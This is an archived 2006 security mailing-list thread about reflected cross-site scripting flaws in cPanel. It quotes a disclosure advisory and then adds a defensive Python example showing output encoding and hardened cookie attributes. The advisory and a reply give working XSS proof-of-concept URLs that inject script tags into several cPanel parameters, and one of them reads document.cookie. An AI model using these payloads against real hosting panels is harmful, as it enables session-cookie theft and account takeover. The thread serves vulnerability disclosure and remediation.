Message-ID: <489d2f300602072145t5bc99ccdl6ada6d30234a4e49@mail.gmail.com>
Date: Wed Feb 8 05:46:04 2006
From: sumit.siddharth at gmail.com (Sumit Siddharth)
Subject: Re: cPanel Multiple Cross Site Scripting Vulnerability
One more for your list:
http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder
Sumit
On 2/4/06, Hamish Stanaway <koremeltdown@...mail.com> wrote:
>
> Hi there,
>
> Thank you for finding this vulnerability in a widely used software. I was
> wondering if you had a solution or a work around to this issue?
>
>
>
> Kindest of regards,
>
> Hamish Stanaway, CEO
>
> Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
> Auckland, New Zealand
>
> http://www.webhosting.net.nz
> http://www.buywebhosting.co.nz
> http://www.koreworks.com
>
>
>
>
>
> >From: simo@...x.org
> >To: bugtraq@...urityfocus.com
> >Subject: cPanel Multiple Cross Site Scripting Vulnerability
> >Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
> >MIME-Version: 1.0
> >Received: from outgoing.securityfocus.com ([205.206.231.27]) by bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri, 3 Feb 2006 08:56:14 -0800
> >Received: from outgoing.securityfocus.com by outgoing.securityfocus.com via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3 Feb 2006 08:33:09 -0800
> >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP id 803C22370A5; Fri, 3 Feb 2006 08:16:33 -0700 (MST)
> >Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000
> >X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA=
> >Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
> >Precedence: bulk
> >List-Id: <bugtraq.list-id.securityfocus.com>
> >List-Post: <mailto:bugtraq@...urityfocus.com>
> >List-Help: <mailto:bugtraq-help@...urityfocus.com>
> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
> >List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
> >Delivered-To: mailing list bugtraq@...urityfocus.com
> >Delivered-To: moderator for bugtraq@...urityfocus.com
> >User-Agent: SquirrelMail/1.4.4
> >X-AntiAbuse: This header was added to track abuse, please include it with
> >any abuse report
> >X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
> >X-AntiAbuse: Original Domain - securityfocus.com
> >X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12]
> >X-AntiAbuse: Sender Address Domain - morx.org
> >X-Source: X-Source-Args: X-Source-Dir: Return-Path:
> >bugtraq-return-23195-koremeltdown=hotmail.com@...urityfocus.com
> >X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC) FILETIME=[BE6AAD60:01C628E2]
> >
> >Title: cPanel Multiple Cross Site Scripting
> >
> >Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> >Discovered: 22 january 2005
> >Published: 02 february 2006
> >MorX Security Research Team
> >http://www.morx.org
> >
> >Service: Web Hosting Manager
> >
> >Vendor: cPanel
> >
> >Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
> >
> >Severity: Medium/High
> >
> >Details:
> >
> >cPanel (control panel) is a graphical web-based management tool, designed
> >to make administration of web sites as easy as possible. cPanel handles
> >all aspects of website administration in an easy-to-use interface.
> >The software, which is proprietary, runs on a number of popular RPM-based
> >Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
> >Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
> >accessed on ports 2082 and 2083 (for an SSL version). Authentication is
> >either via HTTP or web page login. cPanel is prone to cross-site scripting
> >attacks. This problem is due to a failure in the application to properly
> >sanitize user-supplied input.
> >
> >
> >
> >Impact:
> >
> >An attacker can exploit the vulnerable scripts to have arbitrary script
> >code executed in the browser of an authenticated cPanel user in the context
> >of the website hosting the vulnerable cPanel version, resulting in the
> >theft of cookie-based authentication, giving the attacker full access to
> >the victim's cPanel account as well as other types of attacks.
> >
> >
> >Affected scripts with proof of concept exploit:
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxx
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx
> >
> >http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
> >
> >Disclaimer:
> >
> >This entire document is for educational, testing and demonstration purposes
> >only. Modification, use and/or publishing of this information is entirely at
> >your OWN risk. The information provided in this advisory is to be
> >used/tested on your OWN machine/account. I cannot be held responsible for
> >any of the above.
>
>
>
--
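The advisory quoted in this thread attributes the issue to user-supplied input being reflected into the page without sanitization, and Sumit's addition shows the same pattern in the `fwd` parameter of a forwarder form. The Python below is an added example for this archive page, not code from cPanel or from any of the posters. It models a hypothetical handler that reflects `fwd` into two HTML contexts (text content and a quoted attribute value, the two shapes the PoC URLs in the thread rely on), beside a hardened version that applies HTML output encoding, and adds the cookie attributes that blunt the cookie-theft impact the advisory describes. The handler, the function names and the sample query string are constructed for the example.

```python
import html
from urllib.parse import parse_qs

# Constructed sample: the query string from the dowebmailforward.cgi URL
# posted in this thread (percent-encoded <script>alert(document.cookie);</script>).
SAMPLE_QUERY = (
    "fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
    "&action=Add+Forwarder"
)

# Constructed sample: the attribute-breakout shape ("><script>...) used by the
# detailbw.html PoCs in the quoted advisory.
BREAKOUT_QUERY = "fwd=%22%3E%3Cscript%3Ealert%28%27vul%27%29%3C%2Fscript%3E"


def first_param(query: str, name: str) -> str:
    """Return the first (percent-decoded) value of a query parameter, or '' if absent."""
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query: str) -> str:
    """Hypothetical handler that reflects the parameter verbatim.

    This is the defect class the advisory describes: the value lands both in
    text content and inside a double-quoted attribute, so a payload can open a
    <script> tag in the first context or close the attribute in the second."""
    fwd = first_param(query, "fwd")
    return (
        "<p>Forwarding to: " + fwd + "</p>\n"
        '<input name="fwd" value="' + fwd + '">'
    )


def render_hardened(query: str) -> str:
    """Same page with HTML output encoding applied before reflection.

    html.escape(quote=True) turns <, >, &, " and ' into entities, which covers
    both contexts used here: the value can neither start a tag in text content
    nor terminate the quoted attribute it is placed in."""
    fwd = html.escape(first_param(query, "fwd"), quote=True)
    return (
        "<p>Forwarding to: " + fwd + "</p>\n"
        '<input name="fwd" value="' + fwd + '">'
    )


def contains_active_markup(document: str) -> bool:
    """Crude check for the demonstration: does the rendered document contain a raw <script tag?"""
    return "<script" in document.lower()


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie line with the attributes that limit the cookie-theft impact.

    HttpOnly keeps the cookie out of document.cookie (the PoC's target), Secure
    keeps it off plain-HTTP connections such as the port 2082 interface named in
    the advisory, and SameSite=Strict stops browsers attaching it to cross-site
    requests. Cookie name and value are supplied by the caller."""
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure; SameSite=Strict"


if __name__ == "__main__":
    print("vulnerable:\n" + render_vulnerable(SAMPLE_QUERY))
    print("hardened:\n" + render_hardened(SAMPLE_QUERY))
    print(session_cookie_header("cpsession", "EXAMPLE-SESSION-ID"))
```

Running the module prints the two renderings side by side; the vulnerable output contains a live `<script>` element while the hardened output shows `&lt;script&gt;` as inert text. Encoding on output rather than filtering on input is the durable fix, since it is applied at the point where the HTML context is known.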